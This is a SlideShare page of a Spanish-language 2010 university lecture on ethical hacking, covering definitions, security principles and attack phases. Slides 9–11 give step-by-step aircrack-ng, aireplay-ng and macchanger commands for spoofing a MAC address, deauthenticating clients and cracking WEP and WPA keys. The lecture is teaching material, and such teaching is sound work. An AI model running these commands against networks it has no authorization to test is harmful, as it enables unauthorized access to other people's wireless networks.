SlideShare ist ein Scribd-Unternehmen logo
1 von 24
Downloaden Sie, um offline zu lesen
Universidad Tecnológica
 del Sur de Sonora




        Seguridad Informática
        y Ethical Hacking

eXpLoD
Noviembre 2010
Disclaimer
Todos los contenidos, actividades y aplicaciones
(software) mostrados en esta conferencia son con fines
100% educativos, por lo cual los expositores e
institución educativa que los imparten se deslindan de
cualquier responsabilidad que los participantes pudieran
adquirir por el mal uso de estos.
Hacking Ético
El nombre hacker – neologismo utilizado para referirse
a un experto (Gurú) en varias o alguna rama técnica
relacionada con las tecnologías de la información y las
telecomunicaciones: programación, redes, sistemas
operativos.

Cracker – (criminal hacker, 1985). Un cracker es
alguien
que viola la seguridad de un sistema informático de
forma similar a como lo haría un hacker, sólo que a
diferencia de este último, el cracker realiza la intrusión
con fines de beneficio personal o para hacer daño a su
objetivo.
Hacking Ético
Hacker ético – profesionales de la seguridad que
aplican sus conocimientos de hacking con fines
defensivos (y legales).

Ethical Hacking es una disciplina de la seguridad
informática que se sustenta en que la mejor forma de
evaluar las amenazas que representan los llamados
“hackers” o piratas de la información es conocer cómo
actúan y operan.
Elementos esenciales de la
 seguridad.
Confidencialidad – tiene que ver con la ocultación de
información o recursos.

Autenticidad - es la identificación y garantía del origen
de la información.

Integridad - Se refiere a cambios no autorizados en los
datos.

Disponibilidad – Posibilidad de hacer uso de la
información y recursos deseados.
Hacking Ético
1- Reconocimiento
   • Pasivo
2- Rastreo (escaneo)
   • Activo
3- Acceso
   • Sistema operativo/aplicación
   • Redes
   • Denegación de servicio
4- Mantener el acceso
5- Borrado de huellas
Tipos de Hacker
- Black hats
• Individuals with extraordinary computing skills,
resorting to malicious or destructive activities. Also
known as „Crackers.‟

- White Hats
• Individuals professing hacker skills and using them for
defensive purposes. Also known as „Security Analysts‟.

- Gray Hats
• Individuals who work both offensively and defensively
at various times.
Perfil de habilidades de un
hacker ético
  Experto en algún campo
     de la informática.

  Conocimientos profundos
  de diversas plataformas
   (Windows, Unix, Linux).


  Conocimientos de redes.


   Conocimientos de
  hardware y software.
DEMO “Cracking Wireless
Passwords“
 sudo apt-get install aircrack-ng

 sudo apt-get install macchanger

 sudo airmon-ng start wlan0

 sudo ifconfig mon0 down

 sudo macchanger -m 00:11:22:33:44:55 mon0

 sudo ifconfig mon0 up

 sudo airodump-ng mon0
DEMO “Cracking Wireless
  Passwords“
control + c
sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0

PARA WEP

sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0

PARA WPA

sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0

PARA WEP
sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC] -h 00:11:22:33:44:55 mon0

PARA WPA

sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap
DEMO “Cracking Wireless
   Passwords“
PARA WEP

sudo aircrack-ng -z [nombre red]*.cap




Esperaremos a que finalice la captura de los paquetes y a su vez el crackeo de los
mismos, hasta que se nos muestre la clave de la red.
Fase #1:
Reconocimiento
The Dude
Fase #2:
Rastreo (Escaneo)
Nmap y SuperScan
Fase #3:
Acceso
Exploits y Spoofing
Fase #4:
Mantener el Acceso
Remote Copy Paste
Attack


         DEMO
Fase #5:
Borrado de Huellas
(A veces no
necesario)
Conclusiones

 La seguridad computacional como un todo.

 El elemento humano dentro de la seguridad computacional.

 El establecimiento de reglas para un mejor nivel de seguridad.
 Necesidad de profesionistas calificados para estos trabajos.
 Gran amplitud de herramientas OpenSource.

 Compromiso social y ético para sistemas.

 Innovación diaria.
Preguntas y Respuestas
Contacto
Gracias ¡¡

Weitere ähnliche Inhalte

Was ist angesagt?

Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing Explained
Rand W. Hirt
 
Técnicas de evaluación
Técnicas de evaluaciónTécnicas de evaluación
Técnicas de evaluación
joseaunefa
 
Auditoria de Base de Datos
Auditoria de Base de DatosAuditoria de Base de Datos
Auditoria de Base de Datos
Maria Jaspe
 

Was ist angesagt? (20)

Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing Explained
 
Gestion de Seguridad informatica
Gestion de Seguridad informaticaGestion de Seguridad informatica
Gestion de Seguridad informatica
 
Intrusion detection
Intrusion detectionIntrusion detection
Intrusion detection
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERA
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Técnicas de evaluación
Técnicas de evaluaciónTécnicas de evaluación
Técnicas de evaluación
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
 
Nmap
NmapNmap
Nmap
 
Auditoria de Base de Datos
Auditoria de Base de DatosAuditoria de Base de Datos
Auditoria de Base de Datos
 
Nmap
NmapNmap
Nmap
 
Analisis de Vulnerabilidades
Analisis de VulnerabilidadesAnalisis de Vulnerabilidades
Analisis de Vulnerabilidades
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]
 
Iso 27005-espanol
Iso 27005-espanolIso 27005-espanol
Iso 27005-espanol
 
Mecanismos de Seguridad En Informática
Mecanismos de Seguridad En InformáticaMecanismos de Seguridad En Informática
Mecanismos de Seguridad En Informática
 
Tema 1. Seguridad Perimetral
Tema 1. Seguridad PerimetralTema 1. Seguridad Perimetral
Tema 1. Seguridad Perimetral
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
Computo forense presentación power point.
Computo forense presentación power point.Computo forense presentación power point.
Computo forense presentación power point.
 
Metodología crmr
Metodología crmrMetodología crmr
Metodología crmr
 
Cyber kill chain
Cyber kill chainCyber kill chain
Cyber kill chain
 
Metaploit
MetaploitMetaploit
Metaploit
 

Andere mochten auch

Ejemplo De Criptografia
Ejemplo De CriptografiaEjemplo De Criptografia
Ejemplo De Criptografia
Juana Rotted
 
Ejemplos Criptografia
Ejemplos CriptografiaEjemplos Criptografia
Ejemplos Criptografia
prof.2007
 

Andere mochten auch (6)

Seguridad Informática - Fundamentos de Criptografia
Seguridad Informática - Fundamentos de CriptografiaSeguridad Informática - Fundamentos de Criptografia
Seguridad Informática - Fundamentos de Criptografia
 
Criptografia Principios Matemáticos
Criptografia Principios MatemáticosCriptografia Principios Matemáticos
Criptografia Principios Matemáticos
 
Ejemplo De Criptografia
Ejemplo De CriptografiaEjemplo De Criptografia
Ejemplo De Criptografia
 
AzúCar Y Sal
AzúCar Y SalAzúCar Y Sal
AzúCar Y Sal
 
Ejemplos Criptografia
Ejemplos CriptografiaEjemplos Criptografia
Ejemplos Criptografia
 
Componentes Del Interior Del Gabinete
Componentes Del Interior Del GabineteComponentes Del Interior Del Gabinete
Componentes Del Interior Del Gabinete
 

Ähnlich wie Introduccion al Ethical Hacking

Ethical_Hacking_Intro.pptx
Ethical_Hacking_Intro.pptxEthical_Hacking_Intro.pptx
Ethical_Hacking_Intro.pptx
FreddVargas1
 
Vip genial powerpoint con ataques basicos 143806649-hacking-etico
Vip genial powerpoint con ataques basicos 143806649-hacking-eticoVip genial powerpoint con ataques basicos 143806649-hacking-etico
Vip genial powerpoint con ataques basicos 143806649-hacking-etico
xavazquez
 
Seguridad y Penetration Testing
Seguridad y Penetration TestingSeguridad y Penetration Testing
Seguridad y Penetration Testing
Alonso Caballero
 
Ethical hacking udem
Ethical hacking udemEthical hacking udem
Ethical hacking udem
Udem
 
Hackers Grignoli Cortese Parraquini
Hackers Grignoli Cortese ParraquiniHackers Grignoli Cortese Parraquini
Hackers Grignoli Cortese Parraquini
Marcela García
 

Ähnlich wie Introduccion al Ethical Hacking (20)

Material conferencia ITSJR: Hackeo etico
Material conferencia ITSJR: Hackeo eticoMaterial conferencia ITSJR: Hackeo etico
Material conferencia ITSJR: Hackeo etico
 
Ethical_Hacking_Intro.pptx
Ethical_Hacking_Intro.pptxEthical_Hacking_Intro.pptx
Ethical_Hacking_Intro.pptx
 
Jugando al espia v1.0
Jugando al espia v1.0Jugando al espia v1.0
Jugando al espia v1.0
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Vip genial powerpoint con ataques basicos 143806649-hacking-etico
Vip genial powerpoint con ataques basicos 143806649-hacking-eticoVip genial powerpoint con ataques basicos 143806649-hacking-etico
Vip genial powerpoint con ataques basicos 143806649-hacking-etico
 
Seguridad y Penetration Testing
Seguridad y Penetration TestingSeguridad y Penetration Testing
Seguridad y Penetration Testing
 
HACKER y CRACKER
HACKER y CRACKERHACKER y CRACKER
HACKER y CRACKER
 
Trabajo practico n° 4
Trabajo practico n° 4Trabajo practico n° 4
Trabajo practico n° 4
 
Ethical hacking udem
Ethical hacking udemEthical hacking udem
Ethical hacking udem
 
Definiciones reyna
Definiciones reynaDefiniciones reyna
Definiciones reyna
 
Iniciación al Ethical Hacking
Iniciación al Ethical HackingIniciación al Ethical Hacking
Iniciación al Ethical Hacking
 
Hacker
HackerHacker
Hacker
 
El hacker
El hackerEl hacker
El hacker
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Webinar Gratuito: Hacking Ético
Webinar Gratuito: Hacking ÉticoWebinar Gratuito: Hacking Ético
Webinar Gratuito: Hacking Ético
 
Cid
CidCid
Cid
 
técnicas de hackers
técnicas de hackerstécnicas de hackers
técnicas de hackers
 
Summer boot camp sciende umh
Summer boot camp sciende umhSummer boot camp sciende umh
Summer boot camp sciende umh
 
proyecto cracker
proyecto  crackerproyecto  cracker
proyecto cracker
 
Hackers Grignoli Cortese Parraquini
Hackers Grignoli Cortese ParraquiniHackers Grignoli Cortese Parraquini
Hackers Grignoli Cortese Parraquini
 

Mehr von Jose Manuel Acosta

Prevencion y Recuperacion de Incidentes
Prevencion y Recuperacion de IncidentesPrevencion y Recuperacion de Incidentes
Prevencion y Recuperacion de Incidentes
Jose Manuel Acosta
 

Mehr von Jose Manuel Acosta (20)

VPN
VPNVPN
VPN
 
Firewalls
FirewallsFirewalls
Firewalls
 
Hardening windows
Hardening windowsHardening windows
Hardening windows
 
Prevencion y Recuperacion de Incidentes
Prevencion y Recuperacion de IncidentesPrevencion y Recuperacion de Incidentes
Prevencion y Recuperacion de Incidentes
 
Continuidad de Actividades
Continuidad de ActividadesContinuidad de Actividades
Continuidad de Actividades
 
Impress y Draw
Impress y DrawImpress y Draw
Impress y Draw
 
Base
BaseBase
Base
 
Writer y Calc
Writer y CalcWriter y Calc
Writer y Calc
 
Gimp e Inkscape
Gimp e InkscapeGimp e Inkscape
Gimp e Inkscape
 
Evolution y Pidgin
Evolution y PidginEvolution y Pidgin
Evolution y Pidgin
 
Firefox
FirefoxFirefox
Firefox
 
Introducción al Software de Fuentes Abiertas
Introducción al Software de Fuentes AbiertasIntroducción al Software de Fuentes Abiertas
Introducción al Software de Fuentes Abiertas
 
Comandos Básicos en GNU/Linux
Comandos Básicos en GNU/LinuxComandos Básicos en GNU/Linux
Comandos Básicos en GNU/Linux
 
Ubuntu parausuarioswindows
Ubuntu parausuarioswindowsUbuntu parausuarioswindows
Ubuntu parausuarioswindows
 
Iniciando conubuntu1004 en
Iniciando conubuntu1004 enIniciando conubuntu1004 en
Iniciando conubuntu1004 en
 
Cenatic informe internacional
Cenatic informe internacionalCenatic informe internacional
Cenatic informe internacional
 
Instalación de CentOS 5.5 en Modo Texto
Instalación de CentOS 5.5 en Modo TextoInstalación de CentOS 5.5 en Modo Texto
Instalación de CentOS 5.5 en Modo Texto
 
Instalación de Ubuntu 10.04
Instalación de Ubuntu 10.04Instalación de Ubuntu 10.04
Instalación de Ubuntu 10.04
 
Introducción a GNU/Linux
Introducción a GNU/LinuxIntroducción a GNU/Linux
Introducción a GNU/Linux
 
Codigo Malicioso
Codigo MaliciosoCodigo Malicioso
Codigo Malicioso
 

Kürzlich hochgeladen

RESOLUCION_VICE_MINISTERIAL-00048-2024-M-EVALUACIÓN EVALAUCION FORMATIVA MINE...
RESOLUCION_VICE_MINISTERIAL-00048-2024-M-EVALUACIÓN EVALAUCION FORMATIVA MINE...RESOLUCION_VICE_MINISTERIAL-00048-2024-M-EVALUACIÓN EVALAUCION FORMATIVA MINE...
RESOLUCION_VICE_MINISTERIAL-00048-2024-M-EVALUACIÓN EVALAUCION FORMATIVA MINE...
helmer del pozo cruz
 
Ediciones Previas Proyecto de Innovacion Pedagogica ORIGAMI 3D Ccesa007.pdf
Ediciones Previas Proyecto de Innovacion Pedagogica ORIGAMI 3D  Ccesa007.pdfEdiciones Previas Proyecto de Innovacion Pedagogica ORIGAMI 3D  Ccesa007.pdf
Ediciones Previas Proyecto de Innovacion Pedagogica ORIGAMI 3D Ccesa007.pdf
Demetrio Ccesa Rayme
 

Kürzlich hochgeladen (20)

el poder del estado en el siglo XXI.pptx
el poder del estado en el siglo XXI.pptxel poder del estado en el siglo XXI.pptx
el poder del estado en el siglo XXI.pptx
 
Época colonial: vestimenta, costumbres y juegos de la época
Época colonial: vestimenta, costumbres y juegos de la épocaÉpoca colonial: vestimenta, costumbres y juegos de la época
Época colonial: vestimenta, costumbres y juegos de la época
 
RESOLUCION_VICE_MINISTERIAL-00048-2024-M-EVALUACIÓN EVALAUCION FORMATIVA MINE...
RESOLUCION_VICE_MINISTERIAL-00048-2024-M-EVALUACIÓN EVALAUCION FORMATIVA MINE...RESOLUCION_VICE_MINISTERIAL-00048-2024-M-EVALUACIÓN EVALAUCION FORMATIVA MINE...
RESOLUCION_VICE_MINISTERIAL-00048-2024-M-EVALUACIÓN EVALAUCION FORMATIVA MINE...
 
RESPONSABILIDAD SOCIAL EN LAS ORGANIZACIONES (4).pdf
RESPONSABILIDAD SOCIAL EN LAS ORGANIZACIONES (4).pdfRESPONSABILIDAD SOCIAL EN LAS ORGANIZACIONES (4).pdf
RESPONSABILIDAD SOCIAL EN LAS ORGANIZACIONES (4).pdf
 
ciclos biogeoquimicas y flujo de materia ecosistemas
ciclos biogeoquimicas y flujo de materia ecosistemasciclos biogeoquimicas y flujo de materia ecosistemas
ciclos biogeoquimicas y flujo de materia ecosistemas
 
La historia de la vida estudiantil a 102 años de la fundación de las Normales...
La historia de la vida estudiantil a 102 años de la fundación de las Normales...La historia de la vida estudiantil a 102 años de la fundación de las Normales...
La historia de la vida estudiantil a 102 años de la fundación de las Normales...
 
Como construir los vínculos afectivos (Grupal)
Como construir los vínculos afectivos (Grupal)Como construir los vínculos afectivos (Grupal)
Como construir los vínculos afectivos (Grupal)
 
ACERTIJO SOPA DE LETRAS OLÍMPICA. Por JAVIER SOLIS NOYOLA
ACERTIJO SOPA DE LETRAS OLÍMPICA. Por JAVIER SOLIS NOYOLAACERTIJO SOPA DE LETRAS OLÍMPICA. Por JAVIER SOLIS NOYOLA
ACERTIJO SOPA DE LETRAS OLÍMPICA. Por JAVIER SOLIS NOYOLA
 
Tipologías de vínculos afectivos (grupo)
Tipologías de vínculos afectivos (grupo)Tipologías de vínculos afectivos (grupo)
Tipologías de vínculos afectivos (grupo)
 
Power Point : Motivados por la esperanza
Power Point : Motivados por la esperanzaPower Point : Motivados por la esperanza
Power Point : Motivados por la esperanza
 
proyecto semana de los Jardines, actividades a realizar para resaltar esta fecha
proyecto semana de los Jardines, actividades a realizar para resaltar esta fechaproyecto semana de los Jardines, actividades a realizar para resaltar esta fecha
proyecto semana de los Jardines, actividades a realizar para resaltar esta fecha
 
A propósito de la globalización y la financiarización del mundo
A propósito de la globalización y la financiarización del mundoA propósito de la globalización y la financiarización del mundo
A propósito de la globalización y la financiarización del mundo
 
2. Entornos Virtuales de Aprendizaje.pptx
2. Entornos Virtuales de Aprendizaje.pptx2. Entornos Virtuales de Aprendizaje.pptx
2. Entornos Virtuales de Aprendizaje.pptx
 
Estudios Sociales libro 8vo grado Básico
Estudios Sociales libro 8vo grado BásicoEstudios Sociales libro 8vo grado Básico
Estudios Sociales libro 8vo grado Básico
 
tema 6 2eso 2024. Ciencias Sociales. El final de la Edad Media en la Penínsul...
tema 6 2eso 2024. Ciencias Sociales. El final de la Edad Media en la Penínsul...tema 6 2eso 2024. Ciencias Sociales. El final de la Edad Media en la Penínsul...
tema 6 2eso 2024. Ciencias Sociales. El final de la Edad Media en la Penínsul...
 
Tema 9. Roma. 1º ESO 2014. Ciencias SOciales
Tema 9. Roma. 1º ESO 2014. Ciencias SOcialesTema 9. Roma. 1º ESO 2014. Ciencias SOciales
Tema 9. Roma. 1º ESO 2014. Ciencias SOciales
 
LA GEOMETRÍA Y LOS SISTEMAS ANGULARES, APRENDER LEYENDO LA BIBLIA
LA GEOMETRÍA Y LOS SISTEMAS ANGULARES, APRENDER LEYENDO LA BIBLIALA GEOMETRÍA Y LOS SISTEMAS ANGULARES, APRENDER LEYENDO LA BIBLIA
LA GEOMETRÍA Y LOS SISTEMAS ANGULARES, APRENDER LEYENDO LA BIBLIA
 
Seguridad y virus informáticos 12°B 2024
Seguridad y virus informáticos 12°B 2024Seguridad y virus informáticos 12°B 2024
Seguridad y virus informáticos 12°B 2024
 
Ediciones Previas Proyecto de Innovacion Pedagogica ORIGAMI 3D Ccesa007.pdf
Ediciones Previas Proyecto de Innovacion Pedagogica ORIGAMI 3D  Ccesa007.pdfEdiciones Previas Proyecto de Innovacion Pedagogica ORIGAMI 3D  Ccesa007.pdf
Ediciones Previas Proyecto de Innovacion Pedagogica ORIGAMI 3D Ccesa007.pdf
 
CONCLUSIONES DESCRIPTIVAS TIC que ayudaran a tus registrosdocx
CONCLUSIONES DESCRIPTIVAS TIC que ayudaran a tus registrosdocxCONCLUSIONES DESCRIPTIVAS TIC que ayudaran a tus registrosdocx
CONCLUSIONES DESCRIPTIVAS TIC que ayudaran a tus registrosdocx
 

Introduccion al Ethical Hacking

  • 1. Universidad Tecnológica del Sur de Sonora Seguridad Informática y Ethical Hacking eXpLoD Noviembre 2010
  • 2. Disclaimer Todos los contenidos, actividades y aplicaciones (software) mostrados en esta conferencia son con fines 100% educativos, por lo cual los expositores e institución educativa que los imparten se deslindan de cualquier responsabilidad que los participantes pudieran adquirir por el mal uso de estos.
  • 3. Hacking Ético El nombre hacker – neologismo utilizado para referirse a un experto (Gurú) en varias o alguna rama técnica relacionada con las tecnologías de la información y las telecomunicaciones: programación, redes, sistemas operativos. Cracker – (criminal hacker, 1985). Un cracker es alguien que viola la seguridad de un sistema informático de forma similar a como lo haría un hacker, sólo que a diferencia de este último, el cracker realiza la intrusión con fines de beneficio personal o para hacer daño a su objetivo.
  • 4. Hacking Ético Hacker ético – profesionales de la seguridad que aplican sus conocimientos de hacking con fines defensivos (y legales). Ethical Hacking es una disciplina de la seguridad informática que se sustenta en que la mejor forma de evaluar las amenazas que representan los llamados “hackers” o piratas de la información es conocer cómo actúan y operan.
  • 5. Elementos esenciales de la seguridad. Confidencialidad – tiene que ver con la ocultación de información o recursos. Autenticidad - es la identificación y garantía del origen de la información. Integridad - Se refiere a cambios no autorizados en los datos. Disponibilidad – Posibilidad de hacer uso de la información y recursos deseados.
  • 6. Hacking Ético 1- Reconocimiento • Pasivo 2- Rastreo (escaneo) • Activo 3- Acceso • Sistema operativo/aplicación • Redes • Denegación de servicio 4- Mantener el acceso 5- Borrado de huellas
  • 7. Tipos de Hacker - Black hats • Individuals with extraordinary computing skills, resorting to malicious or destructive activities. Also known as „Crackers.‟ - White Hats • Individuals professing hacker skills and using them for defensive purposes. Also known as „Security Analysts‟. - Gray Hats • Individuals who work both offensively and defensively at various times.
  • 8. Perfil de habilidades de un hacker ético Experto en algún campo de la informática. Conocimientos profundos de diversas plataformas (Windows, Unix, Linux). Conocimientos de redes. Conocimientos de hardware y software.
  • 9. DEMO “Cracking Wireless Passwords“ sudo apt-get install aircrack-ng sudo apt-get install macchanger sudo airmon-ng start wlan0 sudo ifconfig mon0 down sudo macchanger -m 00:11:22:33:44:55 mon0 sudo ifconfig mon0 up sudo airodump-ng mon0
  • 10. DEMO “Cracking Wireless Passwords“ control + c sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0 PARA WEP sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0 PARA WPA sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0 PARA WEP sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direccion MAC] -h 00:11:22:33:44:55 mon0 PARA WPA sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap
  • 11. DEMO “Cracking Wireless Passwords“ PARA WEP sudo aircrack-ng -z [nombre red]*.cap Esperaremos a que finalice la captura de los paquetes y a su vez el crackeo de los mismos, hasta que se nos muestre la clave de la red.
  • 20. Fase #5: Borrado de Huellas (A veces no necesario)
  • 21. Conclusiones La seguridad computacional como un todo. El elemento humano dentro de la seguridad computacional. El establecimiento de reglas para un mejor nivel de seguridad. Necesidad de profesionistas calificados para estos trabajos. Gran amplitud de herramientas OpenSource. Compromiso social y ético para sistemas. Innovación diaria.